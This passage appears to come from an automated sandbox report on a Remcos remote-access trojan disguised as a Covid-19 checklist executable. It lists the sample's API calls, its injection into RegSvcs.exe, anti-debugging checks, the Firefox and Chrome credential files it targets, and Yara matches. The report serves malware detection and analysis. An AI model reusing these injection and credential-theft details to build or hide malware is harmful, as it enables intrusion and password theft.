                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00B0477E
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0130FFBC LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0130FFBC
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C56AF3 mov eax, dword ptr fs:[00000030h]0_2_00C56AF3
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C4E4F5
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C5ACA1 GetProcessHeap,0_2_00C5ACA1
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4E643 SetUnhandledExceptionFilter,0_2_00C4E643
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C4E4F5
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C4E7FB
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C57BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C57BE1
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0130A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0130A128
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_01307CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_01307CCD

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\84086963\xdhqeufpq.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processesShow sources
                Source: C:\84086963\xdhqeufpq.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000 value starts with: 4D5AJump to behavior
                Contains functionality to inject code into remote processesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BF219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,6_2_013BF219
                Writes to foreign memory regionsShow sources
                Source: C:\84086963\xdhqeufpq.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000Jump to behavior
                Source: C:\84086963\xdhqeufpq.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11E9000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe6_2_013BA5F5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe12_2_00B0A5F5
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeProcess created: C:\84086963\xdhqeufpq.pif 'C:\84086963\xdhqeufpq.pif' fqficjon.emuJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C0145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013C0145
                Source: RegSvcs.exe, 00000006.00000002.614477153.0000000003636000.00000004.00000040.sdmpBinary or memory string: Program Manager
                Source: RegSvcs.exe, 00000006.00000002.614477153.0000000003636000.00000004.00000040.sdmpBinary or memory string: Program Manageranager
                Source: RegSvcs.exe, 00000006.00000002.614477153.0000000003636000.00000004.00000040.sdmpBinary or memory string: Program Manager0|
                Source: RegSvcs.exe, 00000006.00000002.614477153.0000000003636000.00000004.00000040.sdmpBinary or memory string: Program Managerr|
                Source: RegSvcs.exe, 00000006.00000002.614477153.0000000003636000.00000004.00000040.sdmpBinary or memory string: |Program Manager
                Source: fqficjon.emu.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenC
                Source: xdhqeufpq.pif, 00000004.00000002.615779785.00000000047F0000.00000004.00000001.sdmpBinary or memory string: Program Manager2
                Source: xdhqeufpq.pif, 00000004.00000000.365423124.0000000001372000.00000002.00020000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
                Source: RegSvcs.exe, 00000006.00000002.614477153.0000000003636000.00000004.00000040.sdmpBinary or memory string: |Program Manager|
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00C49D99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,6_2_013B9E7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,12_2_00B09E7D
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4E34B cpuid 0_2_00C4E34B
                Source: C:\84086963\xdhqeufpq.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_00C4CBB8
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0130E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_0130E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C2163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013C2163
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3A995 GetVersionExW,0_2_00C3A995

                Stealing of Sensitive Information:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000003.418699902.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386707521.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418686304.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421704593.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386521048.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388439070.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388390294.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421834849.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418832919.0000000004D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421808057.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421744141.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388650467.00000000048A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418729526.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388336916.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418713297.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.417154110.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386874226.00000000049F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421731075.000000000188B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388305317.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388273489.00000000048C8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386594878.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422168272.0000000002FA0000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421790934.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386755735.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386645318.00000000048A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
                Contains functionality to steal Firefox passwords or cookiesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_013B728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \key3.db6_2_013B728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_00B0728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \key3.db12_2_00B0728F
                Contains functionality to steal Chrome passwords or cookiesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_013B710F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_00B0710F

                Remote Access Functionality:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPE
